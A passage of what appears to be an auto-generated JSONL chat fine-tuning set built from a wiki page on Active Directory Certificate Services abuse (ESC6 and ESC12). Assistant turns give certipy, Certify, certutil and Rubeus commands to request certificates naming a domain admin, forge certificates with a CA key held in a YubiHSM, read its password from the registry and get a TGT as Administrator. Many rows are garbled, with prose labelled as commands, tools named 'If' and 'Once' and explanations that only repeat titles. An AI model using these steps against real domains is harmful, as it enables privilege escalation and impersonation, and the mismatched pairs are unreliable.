editf_attributesubjectaltname2?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"", "metadata": {"corpus_index": 39, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate authority - (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"", "metadata": {"corpus_index": 39, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - (esc6) editf_attributesubjectaltname2. (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep \"User Specified SAN\"`?", "response": "This command is used for certificate authority - (esc6) editf_attributesubjectaltname2. (ESC6) EDITF_ATTRIBUTESUBJECTALTNAME2", "metadata": {"corpus_index": 39, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about To specify a user account in the SAN?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about To specify a user account in the SAN?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'", "metadata": {"corpus_index": 40, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute To specify a user account in the SAN?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute To specify a user account in the SAN?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'", "metadata": {"corpus_index": 40, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain To specify a computer account in the SAN"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including the \"UserSpecifiedSAN\" flag state which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n`powershell\nCertify.exe cas\n`\n\nIf the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.\n\n`powershell\nCertify.exe /enrolleeSuppliesSubject\nCertify.exe /clientauth\n`\n\nOnce the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Certificate template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain To specify a computer account in the SAN", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including the \"UserSpecifiedSAN\" flag state which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n`powershell\nCertify.exe cas\n`\n\nIf the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.\n\n`powershell\nCertify.exe /enrolleeSuppliesSubject\nCertify.exe /clientauth\n`\n\nOnce the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Certificate template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 41, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out To specify a computer account in the SAN during a pentest?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including the \"UserSpecifiedSAN\" flag state which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n`powershell\nCertify.exe cas\n`\n\nIf the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.\n\n`powershell\nCertify.exe /enrolleeSuppliesSubject\nCertify.exe /clientauth\n`\n\nOnce the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Certificate template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out To specify a computer account in the SAN during a pentest?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including the \"UserSpecifiedSAN\" flag state which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.\n\n`powershell\nCertify.exe cas\n`\n\nIf the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.\n\n`powershell\nCertify.exe /enrolleeSuppliesSubject\nCertify.exe /clientauth\n`\n\nOnce the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Certificate template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 41, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the If command to to specify a computer account in the san"}, {"role": "assistant", "content": "If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the If command to to specify a computer account in the san", "response": "If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.", "metadata": {"corpus_index": 42, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do To specify a computer account in the SAN"}, {"role": "assistant", "content": "If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do To specify a computer account in the SAN", "response": "If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.", "metadata": {"corpus_index": 42, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.`?"}, {"role": "assistant", "content": "This command is used for to specify a computer account in the san. To specify a computer account in the SAN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.`?", "response": "This command is used for to specify a computer account in the san. To specify a computer account in the SAN", "metadata": {"corpus_index": 42, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Once command for to specify a computer account in the san"}, {"role": "assistant", "content": "Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Once command for to specify a computer account in the san", "response": "Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).", "metadata": {"corpus_index": 43, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for To specify a computer account in the SAN"}, {"role": "assistant", "content": "Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for To specify a computer account in the SAN", "response": "Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).", "metadata": {"corpus_index": 43, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).`?"}, {"role": "assistant", "content": "This command is used for to specify a computer account in the san. To specify a computer account in the SAN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).`?", "response": "This command is used for to specify a computer account in the san. To specify a computer account in the SAN", "metadata": {"corpus_index": 43, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate authority - Redirect the USB device server"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nFrom a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM connection to a controlled machine.\n\nRead the password value in the HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword registry key, and configure it in the controlled server registry.\n\nThen, find a way to configure the USB device server to connect to the attacker controlled server. For this step, the different tasks to perform may vary between the USB device server solutions in use.\n\n> [!DANGER]\n> Generally USB device server solutions can't connect the device to multiple systems at once. If the device is disconnected from the CA server, the CA will stop working.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate authority - Redirect the USB device server", "response": "::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nFrom a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM connection to a controlled machine.\n\nRead the password value in the HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword registry key, and configure it in the controlled server registry.\n\nThen, find a way to configure the USB device server to connect to the attacker controlled server. For this step, the different tasks to perform may vary between the USB device server solutions in use.\n\n> [!DANGER]\n> Generally USB device server solutions can't connect the device to multiple systems at once. If the device is disconnected from the CA server, the CA will stop working.\n\n:::", "metadata": {"corpus_index": 44, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate authority - Redirect the USB device server?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nFrom a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM connection to a controlled machine.\n\nRead the password value in the HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword registry key, and configure it in the controlled server registry.\n\nThen, find a way to configure the USB device server to connect to the attacker controlled server. For this step, the different tasks to perform may vary between the USB device server solutions in use.\n\n> [!DANGER]\n> Generally USB device server solutions can't connect the device to multiple systems at once. If the device is disconnected from the CA server, the CA will stop working.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate authority - Redirect the USB device server?", "response": "::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nFrom a Windows machine, if the YubiHSM device is connected through a USB device server, with sufficient administrative access to this server it could be possible to redirect the YubiHSM connection to a controlled machine.\n\nRead the password value in the HKEY_LOCAL_MACHINE\\SOFTWARE\\Yubico\\YubiHSM\\AuthKeysetPassword registry key, and configure it in the controlled server registry.\n\nThen, find a way to configure the USB device server to connect to the attacker controlled server. For this step, the different tasks to perform may vary between the USB device server solutions in use.\n\n> [!DANGER]\n> Generally USB device server solutions can't connect the device to multiple systems at once. If the device is disconnected from the CA server, the CA will stop working.\n\n:::", "metadata": {"corpus_index": 44, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate authority - Forge a certificate"}, {"role": "assistant", "content": "If the CA's private key is stored on a physical USB device such as \"YubiHSM2\", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates. \nThis can be used to replicate an ESC1 abuse path and impersonate privileged users.\n\n::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nRetrieve a valid certificate :\n``powershell\ncertipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key\n`\n\nFrom a Windows machine, as a low privileged user connected into the CA server, obtain the CA certificate (it is public) and import it to the user store:\n\n`powershell\ncertutil -addstore -user my ./root-ca.cer\n`\n\nNext, the certificate must be associated to the private key in the YubiHSM2 device:\n\n`powershell\ncertutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my \n`\n\n> [!TIP]\n> Ignore any CRYPT_E_EXISTS error at this point.\n\nUse the CA certificate and its private key with the certutil -sign command to forge new arbitrary certificates.\n\n`powershell\ncertutil -sign ./user_esc12.crt new.crt @extension.inf\n`\n\nThe following .inf file can be used to add a custom SubjectAltName, similarly to the ESC1 abuse.\n\n`powershell\n[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\"\n`\nFinally, recreate the PFX file and use it to retrieve a TGT as a privileged user.\n\n`powershell\nopenssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate authority - Forge a certificate", "response": "If the CA's private key is stored on a physical USB device such as \"YubiHSM2\", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates. \nThis can be used to replicate an ESC1 abuse path and impersonate privileged users.\n\n::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nRetrieve a valid certificate :\n``powershell\ncertipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key\n`\n\nFrom a Windows machine, as a low privileged user connected into the CA server, obtain the CA certificate (it is public) and import it to the user store:\n\n`powershell\ncertutil -addstore -user my ./root-ca.cer\n`\n\nNext, the certificate must be associated to the private key in the YubiHSM2 device:\n\n`powershell\ncertutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my \n`\n\n> [!TIP]\n> Ignore any CRYPT_E_EXISTS error at this point.\n\nUse the CA certificate and its private key with the certutil -sign command to forge new arbitrary certificates.\n\n`powershell\ncertutil -sign ./user_esc12.crt new.crt @extension.inf\n`\n\nThe following .inf file can be used to add a custom SubjectAltName, similarly to the ESC1 abuse.\n\n`powershell\n[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\"\n`\nFinally, recreate the PFX file and use it to retrieve a TGT as a privileged user.\n\n`powershell\nopenssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap\n``\n\n:::", "metadata": {"corpus_index": 45, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate authority - Forge a certificate?"}, {"role": "assistant", "content": "If the CA's private key is stored on a physical USB device such as \"YubiHSM2\", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates. \nThis can be used to replicate an ESC1 abuse path and impersonate privileged users.\n\n::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nRetrieve a valid certificate :\n``powershell\ncertipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key\n`\n\nFrom a Windows machine, as a low privileged user connected into the CA server, obtain the CA certificate (it is public) and import it to the user store:\n\n`powershell\ncertutil -addstore -user my ./root-ca.cer\n`\n\nNext, the certificate must be associated to the private key in the YubiHSM2 device:\n\n`powershell\ncertutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my \n`\n\n> [!TIP]\n> Ignore any CRYPT_E_EXISTS error at this point.\n\nUse the CA certificate and its private key with the certutil -sign command to forge new arbitrary certificates.\n\n`powershell\ncertutil -sign ./user_esc12.crt new.crt @extension.inf\n`\n\nThe following .inf file can be used to add a custom SubjectAltName, similarly to the ESC1 abuse.\n\n`powershell\n[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\"\n`\nFinally, recreate the PFX file and use it to retrieve a TGT as a privileged user.\n\n`powershell\nopenssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate authority - Forge a certificate?", "response": "If the CA's private key is stored on a physical USB device such as \"YubiHSM2\", and a shell access is obtained on the PKI server (even with low privileges), it is possible to modify and sign new certificates. \nThis can be used to replicate an ESC1 abuse path and impersonate privileged users.\n\n::: tabs\n\n=== UNIX-like\n\nAt the time of writing, no solution exists to perform this attack from a UNIX-like machine.\n\n=== Windows\n\nRetrieve a valid certificate :\n``powershell\ncertipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key\n`\n\nFrom a Windows machine, as a low privileged user connected into the CA server, obtain the CA certificate (it is public) and import it to the user store:\n\n`powershell\ncertutil -addstore -user my ./root-ca.cer\n`\n\nNext, the certificate must be associated to the private key in the YubiHSM2 device:\n\n`powershell\ncertutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my \n`\n\n> [!TIP]\n> Ignore any CRYPT_E_EXISTS error at this point.\n\nUse the CA certificate and its private key with the certutil -sign command to forge new arbitrary certificates.\n\n`powershell\ncertutil -sign ./user_esc12.crt new.crt @extension.inf\n`\n\nThe following .inf file can be used to add a custom SubjectAltName, similarly to the ESC1 abuse.\n\n`powershell\n[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\"\n`\nFinally, recreate the PFX file and use it to retrieve a TGT as a privileged user.\n\n`powershell\nopenssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap\n``\n\n:::", "metadata": {"corpus_index": 45, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate authority - forge a certificate?"}, {"role": "assistant", "content": "certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate authority - forge a certificate?", "response": "certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key", "metadata": {"corpus_index": 46, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate authority - Forge a certificate"}, {"role": "assistant", "content": "certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate authority - Forge a certificate", 